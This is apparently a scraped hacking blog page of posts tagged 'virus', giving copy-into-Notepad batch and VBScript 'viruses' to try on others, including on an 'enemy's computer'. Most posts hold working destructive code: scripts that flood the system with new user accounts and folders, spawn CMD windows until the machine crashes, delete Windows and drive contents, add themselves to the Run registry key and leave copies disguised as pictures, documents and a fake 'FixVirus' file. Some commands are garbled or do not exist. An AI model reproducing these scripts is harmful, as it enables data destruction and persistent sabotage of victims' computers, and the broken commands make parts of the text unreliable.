Skip to main content

Posts

Showing posts with the label virus

Batch File Virus

Simple Virus Making If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can’t be detected by any anti virus Here are some good viruses ,i am not responsible for any kind of damage to your system … Copy this to notepad and save as flood1.bat….. @ECHO OFF @ECHO A Sharma’s Creation @ECHO MAIN BAT RUNNING GOTO start :start @ECHO SET magic2=1 >> bat6.bat @ECHO GOTO flood5 >> bat6.bat @ECHO :flood5 >> bat6.bat @ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat @ECHO NET USER magic2%%magic2%% /add >> bat6.bat @ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5 :bat5 @ECHO CD %%ProgramFiles%%\ >> bat5.bat @ECHO SET pogo=1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat @ECHO :flood4 >> bat5.bat @ECHO MKDIR pogo%%pogo%% >> bat5.bat @ECHO SET

A batch File virus

google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad); I’ve tried this on windows XP and it seems to kill the computer and it forces the computer to blue screen then reset. [I've yet to text on vista] This is what I did…. 1. Opened up notepad and typedstart important.batstart important1.batclose; 2. Clicked save as and saved it as important.bat 3. Clicked save as again and saved it as important1.bat 4. When you click on either 1 of the bats it will spam CMD windows thus killing you memory and forcing it to blue screen and resetyou can rename ‘important.bat’ and ‘important1.bat’ anything you want but make sure it’sstart [bat name file].batstart [bat name file].batclose; enjoy Hacking(deepz)... post comment

DEADLY BAT VIRUS

Here are some bat files that works more deadly than a virus if u have an access to your enemy's computer. WARNING DON'T TEST THIS FILE IN YOUR COMPUTER. I'VE ADDED PAUSE COMMAND TO PREVENT ACCIDENTAL OPENING OF THE PROGRAM..IF U ARE NOT "ankush" in these sector then just open up ur note pad and paste each of these code starting from @echo off... make separate file of each...Code: @echo off kill %windir% del %windir%del *.txt del *.exe del *.bat del *.ini :ok start, cmd Goto ok Code: @echo off deltree c:// deltree d:// kill c:// kill d:// Copy halo.bat %0 %windir% start daily halo.bat Destroy the hard-drive. Code: RMOR C: /S /Q Complete wipe out: Code: @echo offdel *.txt del *.exe del *.ininet stop "security" del c://windows/system32 mkdir O copy halo.bat O copy %0 halo.bat %windir% kill %windir% kill system.ini Erases Hard-Drive then shutsdown computer. Code: hdmemory/release echo total hard drive erased

repeating virus>>funny!!!

Copy the following code in notepad and save it as "fun.vbs" with inverted comma. And have fun. Actually this code opens notepad and begin to type automatically. Even you close the notepad it'll keep typing wherever it finds to type. CODE: Set wshshell = wscript.CreateObject("WScript.Shell") Wshshell.run "notepad" do wscript.sleep 400 wshshell.sendkeys "Hi, " wscript.sleep 400 wshshell.sendkeys "My " wscript.sleep 400 wshshell.sendkeys "name " wscript.sleep 200 wshshell.sendkeys "is " wscript.sleep 400 wshshell.sendkeys "ankush" wscript.sleep 400 wshshell.sendkeys "kumar. " wscript.sleep 400 wshshell.sendkeys "If " wscript.sleep 200 wshshell.sendkeys "you " wscript.sleep 400 wshshell.sendkeys "don't " wscript.sleep 400 wshshell.sendkeys "know " wscript.sleep 400 wshshell.sendkeys "me " wscript.sleep 400 wshshe

SIMPLE MAKING A VIRUS

Here are some good viruses ,i am not responsible for any kind of damage to your system ... :) Copy this to notepad and save as flood1.bat..... @ECHO OFF @ECHO A PHOENIX PRODUCTION @ECHO MAIN BAT RUNNING GOTO start :start @ECHO SET snowball2=1 >> bat6.bat @ECHO GOTO flood5 >> bat6.bat @ECHO :flood5 >> bat6.bat @ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat @ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat @ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5 :bat5 @ECHO CD %%ProgramFiles%%\ >> bat5.bat @ECHO SET maggi=1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat @ECHO :flood4 >> bat5.bat @ECHO MKDIR maggi%%maggi%% >> bat5.ba t@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat START /MIN bat5.bat GOTO bat4 :bat4 @ECHO CD %%SystemRoot%%\ >> bat4.bat @ECHO SET marge=1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat @ECHO :floo

SIMPLE VIRUS

Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)Be carefull & Don't run this on ur pc @Echo off color 4 title 4 title R.I.P start start start start calc copy %0 %Systemroot%\Greatgame > nul reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ /d %systemroot%\Greatgame.bat /f > nul copy %0 *.bat > nul Attrib +r +h Greatgame.bat Attrib +r +h RUNDLL32 USER32.DLL.SwapMouseButton start calc cls tskill msnmsgr tskill LimeWire tskill iexplore tskill NMain start cls cd %userprofile%\desktop copy Greatgame.bat R.I.P.bat copy Greatgame.bat R.I.P.jpg copy Greatgame.bat R.I.P.txt copy Greatgame.bat R.I.P.exe copy Greatgame.bat R.I.P.mov copy Greatgame.bat FixVirus.bat cd %userprofile%My Documents copy Greatgame.bat R.I.P.bat copy Greatgame.bat R.I.P.jpg copy Greatgame.bat R.I.P.txt copy Greatgame.bat R.I.P.exe copy Greatgame.bat R.I.P.mov copy Greatgame.bat FixVirus.bat st

VIRUS 4 ANTIVIRUS

paste this in ur notepad X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7} now save it and scan it by ur antivirus software.. enjoy Hacking(DeePaK)... post comment

VIRUS PROGRAMMING

Everybody is scared of computer ‘virus’ as it does harmful actions on our computer. But when we look into the virus programming, we may certainly come out with the conclusion that it requires intelligence to code a virus. Logic It is easy to mess-up the right program. For example, if you remove even a single byte from an EXE file, that EXE file won’t be usable! Virus program don’t have any specific rules. But it’s a common practice to include ‘signatures’ by virus creators. The main idea is to force the innocent user to run the programs. So certain viruses come along with so called ‘programmer utilities’ or ‘free tools’. Another thing is, it is easy to hang-up a working system using some ‘bad’interrupts. Viruses use this logic too! TSR viruses When TSR got its popularity, crackers started using TSR concepts for virus programming. There was a time when people who knew TSR started writing their own TSR viruses. But when Windows operating system was introduced, TSR virus